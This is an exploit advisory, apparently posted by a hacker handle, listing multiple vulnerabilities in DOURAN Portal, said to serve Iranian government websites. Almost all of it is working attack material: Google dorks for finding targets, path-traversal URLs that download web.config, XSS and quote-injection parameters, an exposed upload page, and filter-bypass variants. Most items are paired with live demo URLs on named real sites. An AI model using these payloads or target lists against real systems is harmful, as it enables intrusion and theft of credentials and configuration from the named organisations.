#########################################################################################################################
# #
# Exploit Title : DOURAN Portal Full Ver Multiple Vulnerabilities #
# #
# Author : K0242 #
# #
# Contact : l3lackhat [at] yahoo [dot] com , l3lackhat.ir [at] gmail [dot] com #
# #
# Portal Link : www.DOURAN.com #
# #
# Tested ON : All ver 0f Douran Portal #
# #
# Security Risk : High #
# #
# Description : All target's iranian GOVerment websites #
# #
# DorK : "DOURAN Portal" #
# #
# OR : "inurl:/Homepage.aspx?site=douranPortal&tabid=1&lang=fa-IR" #
# #
# OR : "inurl:/DesktopModules/News/NewsView.aspx?" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
# #
# 1: www.DOURAN.com/Admin/ImportExport/Download.aspx?filename=../../web.config #
# #
# Dem0 : www.zanjan.agri-jahad.ir/Admin/ImportExport/Download.aspx?filename=../../web.config #
# #
# 2: www.DOURAN.com/download.aspx?FileNameAttach=/web.config #
# #
# Dem0 : www.zanjan.agri-jahad.ir/download.aspx?FileNameAttach=/web.config #
# #
# 3: www.DOURAN.com/DesktopModules/fck/editor/filemanager/upload/test.html #
# #
# Dem0 : www.airport.ir/DesktopModules/fck/editor/filemanager/upload/test.html #
# #
# 4: www.DOURAN.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=' #
# #
# Dem0 : www.nisoc.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize=' #
# #
# 5: www.DOURAN.com/DesktopModules/Blog/BlogView.aspx #
# #
# Dem0 : www.smcharity.ir/DesktopModules/Blog/BlogView.aspx #
# #
# 6: www.DOURAN.com/DesktopModules/ftb/ftb.imagegallery.aspx #
# #
# Dem0 : www.isbn.ir/DesktopModules/ftb/ftb.imagegallery.aspx #
# #
# 7: www.DOURAN.com/security/DeviceInfo.aspx #
# #
# Dem0 : www.arjco.com/security/DeviceInfo.aspx #
# #
# 8: www.DOURAN.com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=[XSS] #
# #
# Dem0 : rasht.airport.ir/DesktopModules/Gallery/OrderForm.aspx?site=rasht.airport&lang=fa-IR&tabid=0&itemtitle= #
# #
# #
# 9: www.DOURAN.com/DesktopModules/Gallery/OrderForm.aspx?&site=DouranPortal&lang=fa-IR&tabid=1&itemtitle=[XSS] #
# #
# Dem0 : www.korc.ir/DesktopModules/Gallery/OrderForm.aspx?&site=DouranPortal&lang=fa-IR&tabid=1&itemtitle= #
# #
# #
#########################################################################################################################
# #
# <-- More Douran Portal Xpl --> #
# #
# Description : #
# #
# Regarding Attack technique [1], it is possible to bypass the security protections of ?/download.aspx? #
# in Douran Portal and download the hosted files. #
# #
# P0C: #
# #
# Try this first and see the access denied error: #
# #
# www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config&OriginalAttachFileName=secretfile.txt #
# #
# Now try these to bypass it: #
# #
# 10: www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config\.&OriginalAttachFileName=secretfile.txt #
# #
# 11: www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=web.config%20&OriginalAttachFileName=secretfile.txt #
# #
# 12 : www.DOURAN.com/download.aspx?FilePathAttach=/&FileNameAttach=wEB.CoNfiG&OriginalAttachFileName=secretfile.txt #
# #
#########################################################################################################################
# #
# Greetz : TBH | Cyber Terrorist | NOPOTM | IBH | Aria Security | IrCrash | 0utl4wS #
# #
#########################################################################################################################